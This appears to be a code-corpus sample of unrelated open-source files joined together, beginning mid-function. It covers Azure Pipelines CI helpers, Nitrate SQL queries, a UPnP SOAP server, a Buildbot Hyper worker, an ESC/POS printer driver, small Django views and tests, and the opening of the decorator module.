parameters = dict(
maxBuildsPerDefinition=100, # max 5000
queryOrder='queueTimeDescending', # assumes under normal circumstances that later queued jobs are for later commits
resultFilter='succeeded',
reasonFilter='batchedCI', # may miss some non-PR reasons, the alternative is to filter the list after receiving it
repositoryType=self.repo_type,
repositoryId='%s/%s' % (self.org, self.project),
)
url = '%s%s/_apis/build/builds?api-version=6.0&%s' % (self.org_uri, self.project, urlencode(parameters))
http = HttpClient(self.args, always=True)
response = http.get(url)
# noinspection PyBroadException
try:
result = response.json()
except Exception: # pylint: disable=broad-except
# most likely due to a private project, which returns an HTTP 203 response with HTML
display.warning('Unable to find project. Cannot determine changes. All tests will be executed.')
return set()
commits = set(build['sourceVersion'] for build in result['value'])
return commits
def get_last_successful_commit(self, commits): # type: (t.Set[str]) -> t.Optional[str]
"""Return the last successful commit from git history that is found in the given commit list, or None."""
commit_history = self.git.get_rev_list(max_count=100)
ordered_successful_commits = [commit for commit in commit_history if commit in commits]
last_successful_commit = ordered_successful_commits[0] if ordered_successful_commits else None
return last_successful_commit
def vso_add_attachment(file_type, file_name, path): # type: (str, str, str) -> None
"""Upload and attach a file to the current timeline record."""
vso('task.addattachment', dict(type=file_type, name=file_name), path)
def vso(name, data, message): # type: (str, t.Dict[str, str], str) -> None
"""
Write a logging command for the Azure Pipelines agent to process.
See: https://docs.microsoft.com/en-us/azure/devops/pipelines/scripts/logging-commands?view=azure-devops&tabs=bash
"""
display.info('##vso[%s %s]%s' % (name, ';'.join('='.join((key, value)) for key, value in data.items()), message))
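# Illustration, derived from the format string above (key order may vary with the dict):
#   vso('task.addattachment', dict(type='ansible-core-ci', name='public-key.pem'), '/tmp/key.pem')
# would emit: ##vso[task.addattachment type=ansible-core-ci;name=public-key.pem]/tmp/key.pem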
|
ShaolongHu/Nitrate | refs/heads/develop | tcms/testcases/sqls.py | 1 | REMOVE_COMPONENT = '''
DELETE FROM test_case_components WHERE case_id = %s AND component_id = %s
'''
REMOVE_PLAN = '''
DELETE FROM test_case_plans WHERE plan_id = %s AND case_id = %s
'''
REMOVE_TAG = '''
DELETE FROM test_case_tags WHERE case_id = %s AND tag_id = %s
'''
REMOVE_BUG = '''
DELETE FROM test_case_bugs WHERE bug_id = %s AND case_id = %s AND case_run_id IS NULL
'''
REMOVE_BUG_WITH_RUN_ID = '''
DELETE FROM test_case_bugs WHERE bug_id = %s AND case_id = %s AND case_run_id = %s
'''
TC_PRINTABLE_CASE_TEXTS = '''
SELECT t1.case_id,
t1.summary,
t2.setup,
t2.action,
t2.effect,
t2.breakdown
FROM test_cases t1
INNER JOIN test_case_texts t2
ON ( t1.case_id = t2.case_id )
INNER JOIN (SELECT t4.case_id,
Max(t4.case_text_version) AS max_version
FROM test_case_texts t4
WHERE t4.case_id IN ( %s )
GROUP BY t4.case_id) t3
ON ( t2.case_id = t3.case_id
AND t2.case_text_version = t3.max_version )
WHERE t2.case_id IN ( %s )
'''
TC_EXPORT_ALL_CASES_META = '''
SELECT `test_cases`.`case_id`,
`test_cases`.`summary`,
`test_cases`.`isautomated`,
`test_cases`.`notes`,
`priority`.`value` AS priority,
`test_case_status`.`name` AS case_status,
author.email AS auther_email,
tester.email AS tester_email,
`test_case_categories`.`name` AS category_name
FROM `test_cases`
INNER JOIN `test_case_status` ON (`test_cases`.`case_status_id` = `test_case_status`.`case_status_id`)
INNER JOIN `priority` ON (`priority`.`id` = `test_cases`.`priority_id`)
LEFT JOIN `auth_user` AS author ON (author.id = `test_cases`.`author_id`)
LEFT JOIN `auth_user` AS tester ON (tester.id = `test_cases`.`default_tester_id`)
LEFT JOIN `test_case_categories` ON (`test_case_categories`.`category_id` =
`test_cases`.`category_id`)
WHERE (`test_cases`.`case_id` IN (%s)
AND `test_case_status`.`case_status_id` IN (1,2,4));
'''
TC_EXPORT_ALL_CASES_COMPONENTS = '''
SELECT `test_case_components`.`case_id`,
`components`.`id` as component_id,
`components`.`name` as component_name,
`products`.`name` as product_name
FROM `components`
INNER JOIN `test_case_components` ON (`components`.`id` = `test_case_components`.`component_id`)
INNER JOIN `products` ON (`products`.`id` = `components`.`product_id`)
WHERE `test_case_components`.`case_id` IN (%s)
'''
TC_EXPORT_ALL_CASE_TAGS = '''
SELECT test_cases.case_id,
test_tags.tag_name
FROM test_cases
INNER JOIN test_case_tags ON (test_case_tags.case_id = test_cases.case_id)
INNER JOIN test_tags ON (test_tags.tag_id = test_case_tags.tag_id)
WHERE test_cases.case_id IN (%s)
'''
TC_EXPORT_ALL_CASE_TEXTS = '''
SELECT t1.case_id,
t2.setup,
t2.action,
t2.effect,
t2.breakdown
FROM test_cases t1
INNER JOIN test_case_texts t2
ON ( t1.case_id = t2.case_id )
INNER JOIN (SELECT t4.case_id,
Max(t4.case_text_version) AS max_version
FROM test_case_texts t4
WHERE t4.case_id IN ( %s )
GROUP BY t4.case_id) t3
ON ( t2.case_id = t3.case_id
AND t2.case_text_version = t3.max_version )
WHERE t2.case_id IN ( %s )
'''
GET_TAGS_FROM_CASES_FROM_PLAN = '''
SELECT DISTINCT test_tags.tag_id, test_tags.tag_name
FROM test_tags
INNER JOIN test_case_tags ON (test_tags.tag_id = test_case_tags.tag_id)
INNER JOIN test_cases ON (test_case_tags.case_id = test_cases.case_id)
INNER JOIN test_case_plans ON (test_cases.case_id = test_case_plans.case_id)
WHERE test_cases.case_id IN ({0}) AND test_case_plans.plan_id = %s
'''
GET_TAGS_FROM_CASES = '''
SELECT DISTINCT test_tags.tag_id, test_tags.tag_name
FROM test_tags
INNER JOIN test_case_tags ON (test_tags.tag_id = test_case_tags.tag_id)
INNER JOIN test_cases ON (test_case_tags.case_id = test_cases.case_id)
WHERE test_cases.case_id IN ({0})
'''
|
furbrain/Coherence | refs/heads/maintain/0.6.x | coherence/upnp/core/soap_service.py | 2 | # Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright 2007 - Frank Scholz <[email protected]>
from twisted.web import server, resource
from twisted.python import failure
from twisted.internet import defer
from coherence import log, SERVER_ID
from coherence.extern.et import ET, namespace_map_update
from coherence.upnp.core.utils import parse_xml
from coherence.upnp.core import soap_lite
import coherence.extern.louie as louie
class errorCode(Exception):
def __init__(self, status):
Exception.__init__(self)
self.status = status
class UPnPPublisher(resource.Resource, log.Loggable):
""" Based upon twisted.web.soap.SOAPPublisher and
extracted to remove the SOAPpy dependency
UPnP requires headers and OUT parameters to be returned
in a slightly
different way than the SOAPPublisher class does.
"""
logCategory = 'soap'
isLeaf = 1
encoding = "UTF-8"
envelope_attrib = None
def _sendResponse(self, request, response, status=200):
self.debug('_sendResponse %s %s', status, response)
if status == 200:
request.setResponseCode(200)
else:
request.setResponseCode(500)
if self.encoding is not None:
mimeType = 'text/xml; charset="%s"' % self.encoding
else:
mimeType = "text/xml"
request.setHeader("Content-type", mimeType)
request.setHeader("Content-length", str(len(response)))
request.setHeader("EXT", '')
request.setHeader("SERVER", SERVER_ID)
request.write(response)
request.finish()
def _methodNotFound(self, request, methodName):
response = soap_lite.build_soap_error(401)
self._sendResponse(request, response, status=401)
def _gotResult(self, result, request, methodName, ns):
self.debug('_gotResult %s %s %s %s', result, request, methodName, ns)
response = soap_lite.build_soap_call("{%s}%s" % (ns, methodName), result,
is_response=True,
encoding=None)
#print "SOAP-lite response", response
self._sendResponse(request, response)
def _gotError(self, failure, request, methodName, ns):
self.info('_gotError %s %s', failure, failure.value)
e = failure.value
status = 500
if isinstance(e, errorCode):
status = e.status
else:
failure.printTraceback()
response = soap_lite.build_soap_error(status)
self._sendResponse(request, response, status=status)
def lookupFunction(self, functionName):
function = getattr(self, "soap_%s" % functionName, None)
if not function:
function = getattr(self, "soap__generic", None)
if function:
return function, getattr(function, "useKeywords", False)
else:
return None, None
def render(self, request):
"""Handle a SOAP command."""
data = request.content.read()
headers = request.getAllHeaders()
self.info('soap_request: %s', headers)
# allow external check of data
louie.send('UPnPTest.Control.Client.CommandReceived', None, headers, data)
def print_c(e):
for c in e.getchildren():
print c, c.tag
print_c(c)
tree = parse_xml(data)
#root = tree.getroot()
#print_c(root)
body = tree.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')
method = body.getchildren()[0]
methodName = method.tag
ns = None
if methodName.startswith('{') and methodName.rfind('}') > 1:
ns, methodName = methodName[1:].split('}')
args = []
kwargs = {}
for child in method.getchildren():
kwargs[child.tag] = self.decode_result(child)
args.append(kwargs[child.tag])
#p, header, body, attrs = SOAPpy.parseSOAPRPC(data, 1, 1, 1)
#methodName, args, kwargs, ns = p._name, p._aslist, p._asdict, p._ns
try:
headers['content-type'].index('text/xml')
except:
            self._gotError(failure.Failure(errorCode(415)), request, methodName, ns)
return server.NOT_DONE_YET
self.debug('headers: %r', headers)
function, useKeywords = self.lookupFunction(methodName)
#print 'function', function, 'keywords', useKeywords, 'args', args, 'kwargs', kwargs
if not function:
self._methodNotFound(request, methodName)
return server.NOT_DONE_YET
else:
keywords = {'soap_methodName': methodName}
if(headers.has_key('user-agent') and
headers['user-agent'].find('Xbox/') == 0):
keywords['X_UPnPClient'] = 'XBox'
#if(headers.has_key('user-agent') and
# headers['user-agent'].startswith("""Mozilla/4.0 (compatible; UPnP/1.0; Windows""")):
# keywords['X_UPnPClient'] = 'XBox'
if(headers.has_key('x-av-client-info') and
headers['x-av-client-info'].find('"PLAYSTATION3') > 0):
keywords['X_UPnPClient'] = 'PLAYSTATION3'
if(headers.has_key('user-agent') and
headers['user-agent'].find('Philips-Software-WebClient/4.32') == 0):
keywords['X_UPnPClient'] = 'Philips-TV'
for k, v in kwargs.items():
keywords[str(k)] = v
self.info('call %s %s', methodName, keywords)
if hasattr(function, "useKeywords"):
d = defer.maybeDeferred(function, **keywords)
else:
d = defer.maybeDeferred(function, *args, **keywords)
d.addCallback(self._gotResult, request, methodName, ns)
d.addErrback(self._gotError, request, methodName, ns)
return server.NOT_DONE_YET
def decode_result(self, element):
type = element.get('{http://www.w3.org/1999/XMLSchema-instance}type')
if type is not None:
try:
prefix, local = type.split(":")
if prefix == 'xsd':
type = local
except ValueError:
pass
if type == "integer" or type == "int":
return int(element.text)
if type == "float" or type == "double":
return float(element.text)
if type == "boolean":
return element.text == "true"
return element.text or ""
|
clumsy/intellij-community | refs/heads/master | python/testData/joinLines/BinaryOp.py | 83 | a = <caret>1 +\
2
|
jamesrobertlloyd/gpss-research | refs/heads/master | experiments/2013-12-16-extrap-GPSS-full.py | 4 | Experiment(description='Trying latest code on extrapolation task',
data_dir='../data/tsdlr_9010/',
max_depth=10,
random_order=False,
k=1,
debug=False,
local_computation=False,
n_rand=9,
sd=2,
jitter_sd=0.1,
max_jobs=500,
verbose=False,
make_predictions=True,
skip_complete=True,
results_dir='../results/2013-12-16-extrap-GPSS-full/',
iters=250,
base_kernels='SE,Per,Lin,Const,Noise',
random_seed=1,
period_heuristic=3,
period_heuristic_type='min',
subset=True,
subset_size=250,
full_iters=10,
bundle_size=5,
additive_form=False,
mean='ff.MeanZero()', # Starting mean
kernel='ff.NoiseKernel()', # Starting kernel
lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood
score='bic',
search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}),
('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}),
('A', 'B', {'A': 'kernel', 'B': 'base'}),
('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}),
('A', ('None',), {'A': 'kernel'})])
|
s3nk4s/flaskTutorials | refs/heads/master | FlaskApp/FlaskApp/venv/lib/python2.7/encodings/hex_codec.py | 528 | """ Python 'hex_codec' Codec - 2-digit hex content transfer encoding
Unlike most of the other codecs which target Unicode, this codec
will return Python string objects for both encode and decode.
Written by Marc-Andre Lemburg ([email protected]).
"""
import codecs, binascii
### Codec APIs
def hex_encode(input,errors='strict'):
""" Encodes the object input and returns a tuple (output
object, length consumed).
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.b2a_hex(input)
return (output, len(input))
def hex_decode(input,errors='strict'):
""" Decodes the object input and returns a tuple (output
object, length consumed).
input must be an object which provides the bf_getreadbuf
buffer slot. Python strings, buffer objects and memory
mapped files are examples of objects providing this slot.
errors defines the error handling to apply. It defaults to
'strict' handling which is the only currently supported
error handling for this codec.
"""
assert errors == 'strict'
output = binascii.a2b_hex(input)
return (output, len(input))
class Codec(codecs.Codec):
def encode(self, input,errors='strict'):
return hex_encode(input,errors)
def decode(self, input,errors='strict'):
return hex_decode(input,errors)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
assert self.errors == 'strict'
return binascii.b2a_hex(input)
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
assert self.errors == 'strict'
return binascii.a2b_hex(input)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='hex',
encode=hex_encode,
decode=hex_decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
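# A quick usage sketch (Python 2, assuming this codec is registered through the standard
# encodings search path under the name 'hex'):
#   'hello'.encode('hex')      -> '68656c6c6f'
#   '68656c6c6f'.decode('hex') -> 'hello'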
|
marioaugustorama/yowsup | refs/heads/master | yowsup/layers/axolotl/protocolentities/notification_encrypt.py | 18 | from yowsup.common import YowConstants
from yowsup.layers.protocol_notifications.protocolentities import NotificationProtocolEntity
from yowsup.structs import ProtocolTreeNode
class EncryptNotification(NotificationProtocolEntity):
"""
<notification t="1419824928" id="2451228097" from="s.whatsapp.net" type="encrypt">
<count value="9">
</count>
</notification>
"""
def __init__(self, count, timestamp, _id = None, notify = None, offline = None):
super(EncryptNotification, self).__init__("encrypt", _id, YowConstants.WHATSAPP_SERVER, timestamp, notify, offline)
self.setProps(count)
def setProps(self, count):
self.count = int(count)
def getCount(self):
return self.count
def toProtocolTreeNode(self):
node = super(EncryptNotification, self).toProtocolTreeNode()
countNode = ProtocolTreeNode("count", {"value": str(self.count)})
node.addChild(countNode)
return node
@staticmethod
def fromProtocolTreeNode(node):
entity = NotificationProtocolEntity.fromProtocolTreeNode(node)
entity.__class__ = EncryptNotification
entity.setProps(node.getChild("count")["value"])
return entity |
dbo/selenium | refs/heads/master | py/test/selenium/webdriver/common/appcache_tests.py | 5 | #!/usr/bin/python
#
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common.html5.application_cache import ApplicationCache
import unittest
import pytest
class AppCacheTests(unittest.TestCase):
@pytest.mark.ignore_firefox
def testWeCanGetTheStatusOfTheAppCache(self):
self._loadPage('html5Page')
self.driver.implicitly_wait(2)
app_cache = self.driver.application_cache
status = app_cache.status
while status == ApplicationCache.DOWNLOADING:
status = app_cache.status
self.assertEquals(ApplicationCache.UNCACHED, app_cache.status)
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
|
wainersm/buildbot | refs/heads/master | master/buildbot/worker/hyper.py | 9 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
from twisted.internet import reactor as global_reactor
from twisted.internet import defer
from twisted.internet import threads
from twisted.python import threadpool
from buildbot import config
from buildbot.interfaces import LatentWorkerFailedToSubstantiate
from buildbot.util import service
from buildbot.util.logger import Logger
from buildbot.worker.docker import DockerBaseWorker
try:
import docker # noqa pylint: disable=unused-import
from docker.errors import NotFound
from hyper_sh import Client as Hyper
except ImportError:
Hyper = None
log = Logger()
class HyperLatentManager(service.SharedService):
"""A shared service class that manages all the connections to the hyper cloud
There is one instance of this manager per host, accesskey, secretkey tuple.
This manager manages its own thread pull, as Hyper_sh is blocking.
You can change the maximum number of concurrent access to hyper using
import buildbot.worker.hyper
buildbot.worker.hyper.HyperLatentManager.MAX_THREADS = 1
This feature is undocumented for now, as we are not sure if this is ideal API.
"""
MAX_THREADS = 5
def __init__(self, hyper_host, hyper_accesskey, hyper_secretkey):
service.SharedService.__init__(self)
# Prepare the parameters for the Docker Client object.
self._client_args = {'clouds': {
hyper_host: {
"accesskey": hyper_accesskey,
"secretkey": hyper_secretkey
}
}}
def startService(self):
self._threadPool = threadpool.ThreadPool(
minthreads=1, maxthreads=self.MAX_THREADS, name='hyper')
self._threadPool.start()
self._client = Hyper(self._client_args)
@property
def client(self):
return self._client
def stopService(self):
self.client.close()
return self._threadPool.stop()
def deferToThread(self, reactor, meth, *args, **kwargs):
return threads.deferToThreadPool(reactor, self._threadPool, meth, *args, **kwargs)
class HyperLatentWorker(DockerBaseWorker):
"""hyper.sh is a docker CaaS company"""
instance = None
ALLOWED_SIZES = ['s1', 's2', 's3', 's4',
'm1', 'm2', 'm3', 'l1', 'l2', 'l3']
image = None
reactor = global_reactor
def checkConfig(self, name, password, hyper_host,
hyper_accesskey, hyper_secretkey, image, hyper_size="s3", masterFQDN=None, **kwargs):
DockerBaseWorker.checkConfig(self, name, password, image=image, masterFQDN=masterFQDN, **kwargs)
if not Hyper:
config.error("The python modules 'docker-py>=1.4' and 'hyper_sh' are needed to use a"
" HyperLatentWorker")
if hyper_size not in self.ALLOWED_SIZES:
config.error("Size is not valid {!r} vs {!r}".format(
hyper_size, self.ALLOWED_SIZES))
@property
def client(self):
if self.manager is None:
return None
return self.manager.client
@defer.inlineCallbacks
def reconfigService(self, name, password, hyper_host,
hyper_accesskey, hyper_secretkey, image, hyper_size="s3", masterFQDN=None, **kwargs):
yield DockerBaseWorker.reconfigService(self, name, password, image=image,
masterFQDN=masterFQDN, **kwargs)
self.manager = yield HyperLatentManager.getService(self.master, hyper_host, hyper_accesskey,
hyper_secretkey)
self.size = hyper_size
def deferToThread(self, meth, *args, **kwargs):
return self.manager.deferToThread(self.reactor, meth, *args, **kwargs)
@defer.inlineCallbacks
def start_instance(self, build):
image = yield build.render(self.image)
yield self.deferToThread(self._thd_start_instance, image)
defer.returnValue(True)
def _thd_cleanup_instance(self):
container_name = self.getContainerName()
instances = self.client.containers(
all=1,
filters=dict(name=container_name))
for instance in instances:
            # hyper filtering will match 'hyper12' if you search for 'hyper1'!
if "".join(instance['Names']).strip("/") != container_name:
continue
try:
self.client.remove_container(instance['Id'], v=True, force=True)
except NotFound:
pass # that's a race condition
except docker.errors.APIError as e:
if "Conflict operation on container" not in str(e):
raise
# else: also race condition.
def _thd_start_instance(self, image):
t1 = time.time()
self._thd_cleanup_instance()
t2 = time.time()
instance = self.client.create_container(
image,
environment=self.createEnvironment(),
labels={
'sh_hyper_instancetype': self.size
},
name=self.getContainerName()
)
t3 = time.time()
if instance.get('Id') is None:
raise LatentWorkerFailedToSubstantiate(
'Failed to start container'
)
instance['image'] = image
self.instance = instance
self.client.start(instance)
t4 = time.time()
log.debug('{name}:{containerid}: Container started in {total_time:.2f}', name=self.name,
containerid=self.shortid,
clean_time=t2 - t1, create_time=t3 - t2, start_time=t4 - t3, total_time=t4 - t1)
return [instance['Id'], image]
def stop_instance(self, fast=False):
if self.instance is None:
# be gentle. Something may just be trying to alert us that an
# instance never attached, and it's because, somehow, we never
# started.
return defer.succeed(None)
return self.deferToThread(self._thd_stop_instance, fast)
def _thd_stop_instance(self, fast):
if self.instance is None:
return
log.debug('{name}:{containerid}: Stopping container', name=self.name,
containerid=self.shortid)
t1 = time.time()
try:
self.client.stop(self.instance['Id'])
except NotFound:
# That's ok. container was already deleted, probably by an admin
# lets fail nicely
log.warn('{name}:{containerid}: container was already deleted!', name=self.name,
containerid=self.shortid)
self.instance = None
return
t2 = time.time()
if not fast:
self.client.wait(self.instance['Id'])
t3 = time.time()
self.client.remove_container(self.instance['Id'], v=True, force=True)
t4 = time.time()
log.debug('{name}:{containerid}: Stopped container in {total_time:.2f}', name=self.name,
containerid=self.shortid,
stop_time=t2 - t1, wait_time=t3 - t2, remove_time=t4 - t3, total_time=t4 - t1)
self.instance = None
|
minhphung171093/GreenERP_V9 | refs/heads/master | openerp/addons/hw_escpos/escpos/printer.py | 101 | #!/usr/bin/python
import usb.core
import usb.util
import serial
import socket
from escpos import *
from constants import *
from exceptions import *
from time import sleep
class Usb(Escpos):
""" Define USB printer """
def __init__(self, idVendor, idProduct, interface=0, in_ep=0x82, out_ep=0x01):
"""
@param idVendor : Vendor ID
@param idProduct : Product ID
@param interface : USB device interface
@param in_ep : Input end point
@param out_ep : Output end point
"""
self.errorText = "ERROR PRINTER\n\n\n\n\n\n"+PAPER_FULL_CUT
self.idVendor = idVendor
self.idProduct = idProduct
self.interface = interface
self.in_ep = in_ep
self.out_ep = out_ep
self.open()
def open(self):
""" Search device on USB tree and set is as escpos device """
self.device = usb.core.find(idVendor=self.idVendor, idProduct=self.idProduct)
if self.device is None:
raise NoDeviceError()
try:
if self.device.is_kernel_driver_active(self.interface):
self.device.detach_kernel_driver(self.interface)
self.device.set_configuration()
usb.util.claim_interface(self.device, self.interface)
except usb.core.USBError as e:
raise HandleDeviceError(e)
def close(self):
i = 0
while True:
try:
if not self.device.is_kernel_driver_active(self.interface):
usb.util.release_interface(self.device, self.interface)
self.device.attach_kernel_driver(self.interface)
usb.util.dispose_resources(self.device)
else:
self.device = None
return True
except usb.core.USBError as e:
i += 1
if i > 10:
return False
sleep(0.1)
def _raw(self, msg):
""" Print any command sent in raw format """
if len(msg) != self.device.write(self.out_ep, msg, self.interface):
self.device.write(self.out_ep, self.errorText, self.interface)
raise TicketNotPrinted()
def __extract_status(self):
maxiterate = 0
rep = None
while rep == None:
maxiterate += 1
if maxiterate > 10000:
raise NoStatusError()
r = self.device.read(self.in_ep, 20, self.interface).tolist()
while len(r):
rep = r.pop()
return rep
def get_printer_status(self):
status = {
'printer': {},
'offline': {},
'error' : {},
'paper' : {},
}
self.device.write(self.out_ep, DLE_EOT_PRINTER, self.interface)
printer = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_OFFLINE, self.interface)
offline = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_ERROR, self.interface)
error = self.__extract_status()
self.device.write(self.out_ep, DLE_EOT_PAPER, self.interface)
paper = self.__extract_status()
status['printer']['status_code'] = printer
status['printer']['status_error'] = not ((printer & 147) == 18)
status['printer']['online'] = not bool(printer & 8)
status['printer']['recovery'] = bool(printer & 32)
status['printer']['paper_feed_on'] = bool(printer & 64)
status['printer']['drawer_pin_high'] = bool(printer & 4)
status['offline']['status_code'] = offline
status['offline']['status_error'] = not ((offline & 147) == 18)
status['offline']['cover_open'] = bool(offline & 4)
status['offline']['paper_feed_on'] = bool(offline & 8)
status['offline']['paper'] = not bool(offline & 32)
status['offline']['error'] = bool(offline & 64)
status['error']['status_code'] = error
status['error']['status_error'] = not ((error & 147) == 18)
status['error']['recoverable'] = bool(error & 4)
status['error']['autocutter'] = bool(error & 8)
status['error']['unrecoverable'] = bool(error & 32)
status['error']['auto_recoverable'] = not bool(error & 64)
status['paper']['status_code'] = paper
status['paper']['status_error'] = not ((paper & 147) == 18)
status['paper']['near_end'] = bool(paper & 12)
status['paper']['present'] = not bool(paper & 96)
return status
def __del__(self):
""" Release USB interface """
if self.device:
self.close()
self.device = None
class Serial(Escpos):
""" Define Serial printer """
def __init__(self, devfile="/dev/ttyS0", baudrate=9600, bytesize=8, timeout=1):
"""
@param devfile : Device file under dev filesystem
@param baudrate : Baud rate for serial transmission
@param bytesize : Serial buffer size
@param timeout : Read/Write timeout
"""
self.devfile = devfile
self.baudrate = baudrate
self.bytesize = bytesize
self.timeout = timeout
self.open()
def open(self):
""" Setup serial port and set is as escpos device """
self.device = serial.Serial(port=self.devfile, baudrate=self.baudrate, bytesize=self.bytesize, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=self.timeout, dsrdtr=True)
if self.device is not None:
print "Serial printer enabled"
else:
print "Unable to open serial printer on: %s" % self.devfile
def _raw(self, msg):
""" Print any command sent in raw format """
self.device.write(msg)
def __del__(self):
""" Close Serial interface """
if self.device is not None:
self.device.close()
class Network(Escpos):
""" Define Network printer """
def __init__(self,host,port=9100):
"""
@param host : Printer's hostname or IP address
@param port : Port to write to
"""
self.host = host
self.port = port
self.open()
def open(self):
""" Open TCP socket and set it as escpos device """
self.device = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.device.connect((self.host, self.port))
if self.device is None:
print "Could not open socket for %s" % self.host
def _raw(self, msg):
self.device.send(msg)
def __del__(self):
""" Close TCP connection """
self.device.close()
|
tipsqueal/PuPPyREST | refs/heads/master | puppy/__init__.py | 1 | import puppy.puppy_schema
import puppy.core_routes
import puppy.post_routes
import puppy.user_routes
|
hddn/studentsdb | refs/heads/master | students/views/exams.py | 1 | # -*- coding: utf-8 -*-
from django.views.generic import ListView
from students.models import Exam
from students.util import get_current_group
EXAMS_NUM = 3 # number of exams for pagination
class ExamsListView(ListView):
template_name = 'students/exams.html'
model = Exam
paginate_by = EXAMS_NUM
context_object_name = 'exams'
def get_queryset(self):
current_group = get_current_group(self.request)
if current_group:
queryset = Exam.objects.filter(group=current_group)
else:
queryset = Exam.objects.all()
order_by = self.request.GET.get('order_by', '')
if order_by in ('subject', 'teacher', 'group', 'date'):
queryset = queryset.order_by(order_by)
if self.request.GET.get('reverse', '') == '1':
queryset = queryset.reverse()
return queryset
|
UrQA/URQA-Server | refs/heads/master | external/google-breakpad/src/tools/gyp/test/mac/gyptest-missing-cfbundlesignature.py | 298 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that an Info.plist with CFBundleSignature works.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
test.run_gyp('test.gyp', chdir='missing-cfbundlesignature')
test.build('test.gyp', test.ALL, chdir='missing-cfbundlesignature')
test.built_file_must_match('mytarget.app/Contents/PkgInfo', 'APPL????',
chdir='missing-cfbundlesignature')
test.built_file_must_match('myothertarget.app/Contents/PkgInfo', 'APPL????',
chdir='missing-cfbundlesignature')
test.built_file_must_match('thirdtarget.app/Contents/PkgInfo', 'APPL????',
chdir='missing-cfbundlesignature')
test.pass_test()
|
ycliuhw/kman | refs/heads/master | kman/api/urls.py | 1 | from django.conf.urls import url
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.decorators.csrf import csrf_exempt
from . import views
urlpatterns = [
url(
r'^die/(?P<k>\+?[0-9]*)/?',
csrf_exempt(
xframe_options_exempt(views.DieView.as_view())
),
name='die'
),
]
|
odubno/microblog | refs/heads/master | venv/lib/python2.7/site-packages/decorator.py | 112 | ########################## LICENCE ###############################
# Copyright (c) 2005-2012, Michele Simionato
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# Redistributions in bytecode form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
"""
Decorator module, see http://pypi.python.org/pypi/decorator
for the documentation.
"""
__version__ = '3.4.0'
__all__ = ["decorator", "FunctionMaker", "contextmanager"]
import sys, re, inspect
if sys.version >= '3':
from inspect import getfullargspec
